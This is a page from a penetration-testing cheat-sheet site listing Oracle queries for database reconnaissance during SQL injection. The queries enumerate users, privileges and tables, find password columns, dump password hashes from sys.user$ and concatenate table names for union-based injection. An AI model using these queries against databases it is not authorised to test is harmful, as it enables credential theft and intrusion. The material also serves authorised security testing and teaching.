pwny.cc
  • Home
  • SO
    • AI
      • Evasion
        • Exercise 1
        • Exercise 2
        • Exercise 3
        • Exercise 4
    • Android
      • adb
      • apktool
      • burp suite
      • dns spoofing
      • frida
      • intent
      • jadx
      • JNI
      • objection
      • tcpdump
      • webview
    • iOS
      • objection
    • Linux
      • Internal Recon
      • Bypasses
      • Network
      • Exfiltration
      • Containers
      • Iptables
    • Windows
      • Internal Recon
      • External Recon
      • Bypasses
      • Network
      • Exfiltration
  • SHELLS
    • Misc
    • Web Shells
    • Reverse Shells
    • Obfuscated Shells
  • WEB ATTACKS
    • Misc
    • Command Injection
    • Cross-Site Scripting (XSS)
      • XSS Tips
      • WAF Bypasses
    • Insecure Direct Object Reference (IDOR)
    • Insecure File Upload
    • Local File Inclusion (LFI)
      • Bypass Techniques
      • LFI to RCE
    • OAuth
    • Open Redirect
      • Open Redirect to XSS
    • Server Side Request Forgery (SSRF)
    • Server Side Template Injection (SSTI)
    • SQL Injection (SQLi)
      • SQLMap
      • MySQL
      • MSSQL
      • Oracle
      • PostgreSQL
    • XML External Entity (XXE)
  • OTHER
    • Cracking
      • Hashcat
      • John the Ripper
    • Sandbox Escape
Powered by GitBook
On this page
  • Version
  • Comments
  • Current User
  • List Users
  • List Password Hashes (PRIV)
  • List Privileges (PRIV)
  • List DBA Accounts (PRIV)
  • Current Database
  • List Databases
  • List Tables
  • List Columns
  • Find Tables from Column Name
  • Hostname, IP Address
  • Location of DB Files
  • Get all tablenames in One String

Was this helpful?

  1. WEB ATTACKS
  2. SQL Injection (SQLi)

Oracle

Some of the queries in the table below can only be run by an admin. These are marked with (PRIV) at the description.

Version

SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
SELECT version FROM v$instance;

Comments

SELECT 1; -- comment

Current User

SELECT user FROM dual;

List Users

SELECT username FROM all_users ORDER BY username;
SELECT name FROM sys.user$;

List Password Hashes (PRIV)

#Oracle version <= 10g
SELECT name, password, astatus FROM sys.user$. astatus tells you if acct is locked

#Oracle version 11g
SELECT name,spare4 FROM sys.user$

List Privileges (PRIV)

SELECT FROM session_privs;
SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS;

#List a user's privs
SELECT FROM dba_sys_privs WHERE grantee = 'DBSNMP';

#Find users with a particular priv
SELECT grantee FROM dba_sys_privs WHERE privilege = 'SELECT ANY DICTIONARY';

List DBA Accounts (PRIV)

SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES';

Current Database

SELECT global_name FROM global_name;
SELECT name FROM v$database;
SELECT instance_name FROM v$instance;
SELECT SYS.DATABASE_NAME FROM DUAL;

List Databases

#List schemas (one per user)
SELECT DISTINCT owner FROM all_tables;

List Tables

SELECT table_name FROM all_tables;
SELECT owner, table_name FROM all_tables;

List Columns

SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo';

Find Tables from Column Name

#NB: table names are upper case
SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';

Hostname, IP Address

SELECT UTL_INADDR.get_host_name FROM dual;
SELECT host_name FROM v$instance;

#Gets IP address
SELECT UTL_INADDR.get_host_address FROM dual;

#Gets hostnames
SELECT UTL_INADDR.get_host_name(’10.0.0.1′) FROM dual;

Location of DB Files

SELECT name FROM V$DATAFILE;

Get all tablenames in One String

#When using union based SQLi with only one row
SELECT rtrim(xmlagg(xmlelement(e, table_name || ',')).extract('//text()').extract('//text()') ,',') from all_tables
PreviousMSSQLNextPostgreSQL

Last updated 3 years ago

Was this helpful?